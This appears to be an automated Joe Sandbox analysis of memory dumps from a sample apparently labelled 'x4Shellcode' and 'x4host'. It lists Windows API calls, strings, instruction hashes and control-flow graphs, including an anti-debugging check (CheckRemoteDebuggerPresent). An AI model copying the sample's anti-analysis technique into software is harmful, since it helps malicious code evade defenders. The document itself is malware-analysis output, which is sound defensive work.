2684->2677 2690 7a1b9a-7a1b9d 2685->2690 2691 7a1ba3-7a1ba8 2685->2691 2686->2673 2687->2696 2702 7a1ac5-7a1ad0 call 7a15d3 2687->2702 2688->2664 2693 7a1a88 2688->2693 2689->2667 2690->2664 2690->2691 2691->2658 2693->2687 2696->2664 2697->2696 2702->2696
                                                  APIs
                                                  • RtlDecodePointer.NTDLL(00000000), ref: 007A1A3E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: 05147b77e017ceae7c9bcd19d0d5a1762f2ad26aa36c5b60a1330da9aef12eee
                                                  • Instruction ID: d13f4245f6295e6d623aa740baf8375a1bb52325971561b425be4a3f5251768f
                                                  • Opcode Fuzzy Hash: 05147b77e017ceae7c9bcd19d0d5a1762f2ad26aa36c5b60a1330da9aef12eee
                                                  • Instruction Fuzzy Hash: E551707090190ECBEF10DF58D9486ECBBB4FFCA310F904295D451A6254DB7D8E64CB68
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,007A8311,?,00000000,?,00000000,00000000), ref: 007A7BDE
                                                  • __fassign.LIBCMT ref: 007A7C59
                                                  • __fassign.LIBCMT ref: 007A7C74
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 007A7C9A
                                                  • WriteFile.KERNEL32(?,?,00000000,007A8311,00000000,?,?,?,?,?,?,?,?,?,007A8311,?), ref: 007A7CB9
                                                  • WriteFile.KERNEL32(?,?,00000001,007A8311,00000000,?,?,?,?,?,?,?,?,?,007A8311,?), ref: 007A7CF2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: e76a990ad7823ac8d5fea4256fe0a354a67385d9aeb23aa01fd0ed9021df75f2
                                                  • Instruction ID: 246170436ead5d8511690fadd615a4a3d43d7dbf7d95c1726b1802b167a3b3fb
                                                  • Opcode Fuzzy Hash: e76a990ad7823ac8d5fea4256fe0a354a67385d9aeb23aa01fd0ed9021df75f2
                                                  • Instruction Fuzzy Hash: E1510C71A04209EFCF14CFA8DC45AEEBBF8EF4A300F14465AE555E7291D7349941CBA0
                                                  APIs
                                                    • Part of subcall function 007A31DA: _free.LIBCMT ref: 007A3203
                                                  • _free.LIBCMT ref: 007A3264
                                                    • Part of subcall function 007A2096: HeapFree.KERNEL32(00000000,00000000,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?), ref: 007A20AC
                                                    • Part of subcall function 007A2096: GetLastError.KERNEL32(?,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?,?), ref: 007A20BE
                                                  • _free.LIBCMT ref: 007A326F
                                                  • _free.LIBCMT ref: 007A327A
                                                  • _free.LIBCMT ref: 007A32CE
                                                  • _free.LIBCMT ref: 007A32D9
                                                  • _free.LIBCMT ref: 007A32E4
                                                  • _free.LIBCMT ref: 007A32EF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                  • Instruction ID: f241df92469c81de2a73d508306c3f53f1f49a5bc3f5d03d825d4e06cbeca43e
                                                  • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                  • Instruction Fuzzy Hash: 64111F72A41B08EAD530FFB0CC0BFCB779C6F87740F404A15BAAE66052DA69B6058650
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,007A473A,?,?,00000000), ref: 007A4543
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,007A473A,?,?,00000000,?,?,?), ref: 007A45C9
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007A46C3
                                                  • __freea.LIBCMT ref: 007A46D0
                                                    • Part of subcall function 007A32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007A332C
                                                  • __freea.LIBCMT ref: 007A46D9
                                                  • __freea.LIBCMT ref: 007A46FE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: fa38ebf12fddf842cef18dfa69dbe65d7a03b299fbd49f59af8a837b2f8fb1a0
                                                  • Instruction ID: 9bbac4fd9baa20206e2fedbf3e66ac50e8c9c7eec56367dccf92f5c3ee01465a
                                                  • Opcode Fuzzy Hash: fa38ebf12fddf842cef18dfa69dbe65d7a03b299fbd49f59af8a837b2f8fb1a0
                                                  • Instruction Fuzzy Hash: C351BF72600216ABDF259E64CC45EBB77A9EBC7750F194728F804D7190EBBEDCA0C650
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: 4467cafea4201b5eecfbd479b49a99fa8087c0e4d35d87314b864dfcb99e9eb5
                                                  • Instruction ID: 132939262292cc493eddd3b4fdff1972cf8e4ef41808dbfbc9b38fb64f2c98da
                                                  • Opcode Fuzzy Hash: 4467cafea4201b5eecfbd479b49a99fa8087c0e4d35d87314b864dfcb99e9eb5
                                                  • Instruction Fuzzy Hash: A0F0A432104601AAE2522739AC0EF2B165A9BC3771FA58338F915A2292FF6D8C43C255
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007A3F73,00000003,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002), ref: 007A3FE2
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007A3FF5
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,007A3F73,00000003,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002,00000000), ref: 007A4018
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 34465fac112fdbee1812e5c963038116edc021c89f6f7f3526255f9f2b1b5dbf
                                                  • Instruction ID: 9944c6c05588f38158551297475411c90f676ab8b8098a6c35d4fd70bafb08e8
                                                  • Opcode Fuzzy Hash: 34465fac112fdbee1812e5c963038116edc021c89f6f7f3526255f9f2b1b5dbf
                                                  • Instruction Fuzzy Hash: 12F0C230A0021CBBCB549F94DC09BAEBFB5EFC5711F0081A8F805A2150DBBD8E40DB95
                                                  APIs
                                                  • GetLastError.KERNEL32(00000008,?,?,007A15D8,007A3CBB,?,007A1D2A,?,?,00000000), ref: 007A18E4
                                                  • _free.LIBCMT ref: 007A1919
                                                  • _free.LIBCMT ref: 007A1940
                                                  • SetLastError.KERNEL32(00000000,?,007A1D2A,?,?,00000000), ref: 007A194D
                                                  • SetLastError.KERNEL32(00000000,?,007A1D2A,?,?,00000000), ref: 007A1956
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 1e8fe56cc9b788ed1329013809c06cd1cb6710cfe1d41e9d046fb15c8df3e896
                                                  • Instruction ID: fc912974f1a3a3e7d7c9a20720a8ff23ef341c18a4d9ba4f2d03a9d596c4fd9c
                                                  • Opcode Fuzzy Hash: 1e8fe56cc9b788ed1329013809c06cd1cb6710cfe1d41e9d046fb15c8df3e896
                                                  • Instruction Fuzzy Hash: F2012632100201BBB21226386C99F3B121D9BC3374F614328F510A2193FB2E9807C110
                                                  APIs
                                                  • _free.LIBCMT ref: 007A3189
                                                    • Part of subcall function 007A2096: HeapFree.KERNEL32(00000000,00000000,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?), ref: 007A20AC
                                                    • Part of subcall function 007A2096: GetLastError.KERNEL32(?,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?,?), ref: 007A20BE
                                                  • _free.LIBCMT ref: 007A319B
                                                  • _free.LIBCMT ref: 007A31AD
                                                  • _free.LIBCMT ref: 007A31BF
                                                  • _free.LIBCMT ref: 007A31D1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: ccf1dd2158c66a5d2a997f8843cd61abf4f49f900c7e2c40872721f126a38d71
                                                  • Instruction ID: a87e4c1d5cc298d7e0840a416210c5a83eee00a6fb7cfd957cf3b1fe58773bda
                                                  • Opcode Fuzzy Hash: ccf1dd2158c66a5d2a997f8843cd61abf4f49f900c7e2c40872721f126a38d71
                                                  • Instruction Fuzzy Hash: FAF01D32605604EB8634EF68F98AC1B73D9BA867117644A09F559D7602CB3CFD818AE8
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
                                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: RtlGetVersion$ntdll.dll
                                                  • API String ID: 1646373207-1489217083
                                                  • Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                                                  • Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
                                                  • Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                                                  • Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 007A354C
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007A35D5
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007A35E7
                                                  • __freea.LIBCMT ref: 007A35F0
                                                    • Part of subcall function 007A32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007A332C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  • Opcode ID: 27b8bb10f343ce2c5c399f6cd4f947e4f460091fe088fe9845769d2b11f124eb
                                                  • Instruction ID: ff4988103d8ad57797b211998575d941bb9f68003de54c6004200b0b406edc43
                                                  • Opcode Fuzzy Hash: 27b8bb10f343ce2c5c399f6cd4f947e4f460091fe088fe9845769d2b11f124eb
                                                  • Instruction Fuzzy Hash: 77318E72A0021AABDF259F78DC45DAE7BA5EF82310F154229FC04D7250EB39CE64CB90
                                                  APIs
                                                  • SetFilePointerEx.KERNEL32 ref: 0076B2BA
                                                  • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 0076B2E0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: File$PointerWrite
                                                  • String ID:
                                                  • API String ID: 539440098-0
                                                  • Opcode ID: adfd102db01abccb4628f0d101e9eaf87fb6d1880aec12248e36bf1f1b50da76
                                                  • Instruction ID: 64fe02c7ec1cb65a8fc9d49c628e74db97ae3301877f883eb6cfd5cc3e0fbc7f
                                                  • Opcode Fuzzy Hash: adfd102db01abccb4628f0d101e9eaf87fb6d1880aec12248e36bf1f1b50da76
                                                  • Instruction Fuzzy Hash: AA31826154C384AED7119B2A882572FBFE0AF93714F48854DECD6C6291D3BC88888793
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007A15D8,00000000,00000000,?,007A2132,007A15D8,00000000,00000000,00000000,?,007A2283,00000006,FlsSetValue), ref: 007A21BD
                                                  • GetLastError.KERNEL32(?,007A2132,007A15D8,00000000,00000000,00000000,?,007A2283,00000006,FlsSetValue,007B6FC4,FlsSetValue,00000000,00000364,?,007A192D), ref: 007A21C9
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007A2132,007A15D8,00000000,00000000,00000000,?,007A2283,00000006,FlsSetValue,007B6FC4,FlsSetValue,00000000), ref: 007A21D7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: c1d02e5c0fe98fec8141f66a9459605ccf4c60eaff9844b3e125b88fc5616d74
                                                  • Instruction ID: 945c0da3d4dbf269d5b32b7e312c412d66a7950c862047a5352fe2c288e7835c
                                                  • Opcode Fuzzy Hash: c1d02e5c0fe98fec8141f66a9459605ccf4c60eaff9844b3e125b88fc5616d74
                                                  • Instruction Fuzzy Hash: CA01FC3270122ABBC7214A6CDC44E667B98AFC7B60B214724FA15D3141C72CDD02C7F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: pow
                                                  • API String ID: 0-2276729525
                                                  • Opcode ID: 17234d7eb6a3326173fad8f560cab46a7c944285189b4f49f312f9d903876069
                                                  • Instruction ID: deb30e62237b4da6331f56b0b78961206c9aebb5a5a94589592569205bbca149
                                                  • Opcode Fuzzy Hash: 17234d7eb6a3326173fad8f560cab46a7c944285189b4f49f312f9d903876069
                                                  • Instruction Fuzzy Hash: 9C51AB61A0910AC6EF157F14ED4577B77A0DB82700F60CF38E4D5C22A9EB3D8CD29A86
                                                  APIs
                                                    • Part of subcall function 007A29AE: GetOEMCP.KERNEL32 ref: 007A29D9
                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007A2C7C,?,00000000), ref: 007A2E4F
                                                  • GetCPInfo.KERNEL32(00000000,|,z,?,?,?,007A2C7C,?,00000000), ref: 007A2E62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: CodeInfoPageValid
                                                  • String ID: |,z
                                                  • API String ID: 546120528-726383530
                                                  • Opcode ID: ef0ac1c2610f3b93478387e2bdcced8b0d740e0c77870daa4cbc4dfa6c7431c3
                                                  • Instruction ID: c92b4f024f3794bd2a1cac6a1eb3120a7f9ff3306fdc9d38b9ea3debc1c7efdd
                                                  • Opcode Fuzzy Hash: ef0ac1c2610f3b93478387e2bdcced8b0d740e0c77870daa4cbc4dfa6c7431c3
                                                  • Instruction Fuzzy Hash: A95116709082459EDB248F29C848ABBBBF5EFC3304F14866ED4969B153D73D9943CB90
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007A4CAE
                                                  • ___raise_securityfailure.LIBCMT ref: 007A4D95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                  • String ID: 0|
                                                  • API String ID: 3761405300-1398520540
                                                  • Opcode ID: 774ac7040ec613a54befba42bbca062f37d2b5ac2ea42f2b2fd4caabd56eda0a
                                                  • Instruction ID: ebf407053683afc27d7a3403914fc5e4d6e1bab4b6e9e21b7b0ce35f74fa8f4a
                                                  • Opcode Fuzzy Hash: 774ac7040ec613a54befba42bbca062f37d2b5ac2ea42f2b2fd4caabd56eda0a
                                                  • Instruction Fuzzy Hash: 2C2103B5512704DAE314CF19F985F587BA4BB88310F10D12EE9099ABA1E3BC9581CFC8

                                                  Execution Graph

                                                  Execution Coverage:22.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:50%
                                                  Total number of Nodes:6
                                                  Total number of Limit Nodes:0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 181 7ffd9b88f869-7ffd9b88f885 182 7ffd9b88f887 181->182 183 7ffd9b88f888-7ffd9b88f8da 181->183 182->183 185 7ffd9b88f8dc 183->185 186 7ffd9b88f8e1-7ffd9b88f8f8 183->186 185->186 187 7ffd9b88f8fa-7ffd9b88f8ff call 7ffd9b88be08 186->187 188 7ffd9b88f900-7ffd9b88f92f 186->188 187->188 192 7ffd9b88f935-7ffd9b88f951 188->192 193 7ffd9b88fee8-7ffd9b88fef0 call 7ffd9b88be08 188->193 194 7ffd9b88f957-7ffd9b88f965 192->194 195 7ffd9b88fbd2-7ffd9b88fc4d 192->195 200 7ffd9b88ff95-7ffd9b88ff9d 193->200 201 7ffd9b88fef5-7ffd9b88ff82 193->201 197 7ffd9b88f967 194->197 198 7ffd9b88f96c-7ffd9b88f983 194->198 212 7ffd9b88fe43-7ffd9b88fe82 195->212 213 7ffd9b88fc53-7ffd9b88fc70 195->213 197->198 203 7ffd9b88f989-7ffd9b88fa59 call 7ffd9b88bef8 call 7ffd9b8880f8 198->203 204 7ffd9b88fb84-7ffd9b88fb93 198->204 225 7ffd9b88ff89-7ffd9b88ff94 201->225 252 7ffd9b88fb19-7ffd9b88fb2c 203->252 253 7ffd9b88fa5f-7ffd9b88fabe 203->253 206 7ffd9b88fb95 204->206 207 7ffd9b88fb9a-7ffd9b88fbca 204->207 206->207 215 7ffd9b88fbcb-7ffd9b88fbcd 207->215 222 7ffd9b88fe89-7ffd9b88fe94 212->222 223 7ffd9b88fe84 212->223 226 7ffd9b88fc9a-7ffd9b88fce6 213->226 227 7ffd9b88fc72-7ffd9b88fc95 213->227 219 7ffd9b88fee4-7ffd9b88fee6 215->219 219->201 228 7ffd9b88fe96 222->228 229 7ffd9b88fe9b-7ffd9b88fea2 222->229 223->222 225->200 247 7ffd9b88fd23-7ffd9b88fd2f 226->247 227->247 228->229 232 7ffd9b88fea9-7ffd9b88feb0 229->232 233 7ffd9b88fea4 229->233 237 7ffd9b88feb7-7ffd9b88feba 232->237 238 7ffd9b88feb2 232->238 233->232 241 7ffd9b88febc 237->241 242 7ffd9b88fec1-7ffd9b88fee3 237->242 238->237 241->242 242->219 256 7ffd9b88fb2e 252->256 257 7ffd9b88fb33-7ffd9b88fb3a 252->257 253->252 256->257 259 7ffd9b88fb3c 257->259 260 7ffd9b88fb41-7ffd9b88fb48 257->260 259->260 261 7ffd9b88fb4a 260->261 262 7ffd9b88fb4f-7ffd9b88fb52 260->262 261->262 263 7ffd9b88fb59-7ffd9b88fb82 262->263 264 7ffd9b88fb54 262->264 263->215 264->263
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3020328795.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffd9b880000_x4host.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *N_H
                                                  • API String ID: 0-3521886389
                                                  • Opcode ID: af974cfa11d07159d8d61ec9c6523c0f49e78ea7f66125140eb2725be3f2bb0f
                                                  • Instruction ID: 51a9d74611185775ea86ba0fc0e3b512dfd787953bf2c20dd34ad337f95535b8
                                                  • Opcode Fuzzy Hash: af974cfa11d07159d8d61ec9c6523c0f49e78ea7f66125140eb2725be3f2bb0f
                                                  • Instruction Fuzzy Hash: 70028130A0991D8FEB98EB68D8A5BB877F1FF59310F1005B9D05DD32A6DE386981CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 354 7ffd9b887801-7ffd9b8878bd CheckRemoteDebuggerPresent 358 7ffd9b8878bf 354->358 359 7ffd9b8878c5-7ffd9b887908 354->359 358->359
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3020328795.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffd9b880000_x4host.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: 74543eee156ae07685e1831d57b93a1c09333c890b39f23c1a90d44699044a33
                                                  • Instruction ID: 11907edf4b211db48f28206dd516542b7aa005fd3fab58b4b364dd3d263d4d34
                                                  • Opcode Fuzzy Hash: 74543eee156ae07685e1831d57b93a1c09333c890b39f23c1a90d44699044a33
                                                  • Instruction Fuzzy Hash: 8531223190875C8FCB58DF58C886BE97BF0EF65321F0542ABD489D7292DB34A842CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 887 7ffd9b88be28-7ffd9b8902fa 889 7ffd9b8902fc 887->889 890 7ffd9b890301-7ffd9b890366 call 7ffd9b88bf38 call 7ffd9b890020 887->890 889->890 896 7ffd9b890368 890->896 897 7ffd9b89036d-7ffd9b890398 call 7ffd9b88bfd0 890->897 896->897 900 7ffd9b8903e9-7ffd9b8903f0 897->900 901 7ffd9b89039a-7ffd9b8903a1 897->901 904 7ffd9b890415-7ffd9b89041c 900->904 905 7ffd9b8903f2-7ffd9b8903f9 900->905 902 7ffd9b8903c6-7ffd9b8903cd 901->902 903 7ffd9b8903a3-7ffd9b8903aa 901->903 908 7ffd9b89056e-7ffd9b890592 902->908 909 7ffd9b8903d3-7ffd9b8903dd 902->909 906 7ffd9b89050e-7ffd9b890532 903->906 907 7ffd9b8903b0-7ffd9b8903ba 903->907 912 7ffd9b89041e-7ffd9b890428 904->912 913 7ffd9b890430-7ffd9b89044e 904->913 910 7ffd9b8903ff-7ffd9b890409 905->910 911 7ffd9b8904b4-7ffd9b8904d2 905->911 937 7ffd9b890827-7ffd9b890838 906->937 938 7ffd9b890538-7ffd9b890539 906->938 923 7ffd9b89045a-7ffd9b89047e 907->923 924 7ffd9b8903c0-7ffd9b8903c1 907->924 930 7ffd9b890a08-7ffd9b890a35 908->930 931 7ffd9b890598-7ffd9b890599 908->931 926 7ffd9b8904de-7ffd9b890502 909->926 927 7ffd9b8903e3-7ffd9b8903e4 909->927 928 7ffd9b89053e-7ffd9b890562 910->928 929 7ffd9b89040f-7ffd9b890410 910->929 932 7ffd9b8904d8-7ffd9b8904d9 911->932 933 7ffd9b890690-7ffd9b8906a1 911->933 920 7ffd9b89048a-7ffd9b8904a8 912->920 921 7ffd9b89042a-7ffd9b89042b 912->921 935 7ffd9b89059e-7ffd9b8905ce call 7ffd9b88bea8 913->935 936 7ffd9b890454-7ffd9b890455 913->936 955 7ffd9b8904ae-7ffd9b8904af 920->955 956 7ffd9b890683-7ffd9b890684 call 7ffd9b88be08 920->956 934 7ffd9b890ab4-7ffd9b890ac1 921->934 953 7ffd9b890606-7ffd9b890642 call 7ffd9b88bea8 923->953 954 7ffd9b890484-7ffd9b890485 923->954 924->934 951 7ffd9b890766-7ffd9b890777 926->951 952 7ffd9b890508-7ffd9b890509 926->952 927->934 957 7ffd9b8908f7-7ffd9b890908 928->957 958 7ffd9b890568-7ffd9b890569 928->958 929->934 962 7ffd9b890a37 930->962 963 7ffd9b890a3c-7ffd9b890a6f 930->963 931->934 932->934 946 7ffd9b8906a8-7ffd9b8906c8 933->946 947 7ffd9b8906a3 933->947 977 7ffd9b8905ff-7ffd9b890601 935->977 978 7ffd9b8905d0-7ffd9b8905fe call 7ffd9b88be98 935->978 936->934 942 7ffd9b89083a 937->942 943 7ffd9b89083f-7ffd9b890862 937->943 938->934 942->943 973 7ffd9b890869-7ffd9b8908bb 943->973 974 7ffd9b890864 943->974 969 7ffd9b8906ca 946->969 970 7ffd9b8906cf-7ffd9b890705 946->970 947->946 964 7ffd9b890779 951->964 965 7ffd9b89077e-7ffd9b8907a1 951->965 952->934 991 7ffd9b89067c-7ffd9b89067e 953->991 992 7ffd9b890644-7ffd9b89067b call 7ffd9b88be98 953->992 954->934 955->934 972 7ffd9b890689-7ffd9b89068b 956->972 967 7ffd9b89090a 957->967 968 7ffd9b89090f-7ffd9b890941 957->968 958->934 962->963 986 7ffd9b890a76-7ffd9b890ab2 call 7ffd9b88bf08 963->986 987 7ffd9b890a71 963->987 964->965 988 7ffd9b8907a8-7ffd9b8907ed 965->988 989 7ffd9b8907a3 965->989 967->968 983 7ffd9b890948-7ffd9b890997 968->983 984 7ffd9b890943 968->984 969->970 999 7ffd9b890707 970->999 1000 7ffd9b89070c-7ffd9b89072f 970->1000 972->934 1016 7ffd9b8908bd 973->1016 1017 7ffd9b8908c2-7ffd9b8908f2 call 7ffd9b88bec8 973->1017 974->973 977->934 978->977 1001 7ffd9b890999-7ffd9b8909bb 983->1001 1002 7ffd9b8909bd-7ffd9b8909d7 983->1002 984->983 986->934 987->986 1011 7ffd9b8907ef 988->1011 1012 7ffd9b8907f4-7ffd9b890822 call 7ffd9b88bfc0 988->1012 989->988 991->934 992->991 999->1000 1019 7ffd9b890736-7ffd9b89075a call 7ffd9b88bf88 1000->1019 1020 7ffd9b890731 1000->1020 1009 7ffd9b8909dd-7ffd9b890a03 call 7ffd9b88bed8 1001->1009 1002->1009 1009->934 1011->1012 1012->934 1016->1017 1017->934 1030 7ffd9b89075f-7ffd9b890761 1019->1030 1020->1019 1030->934
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3020328795.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffd9b880000_x4host.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
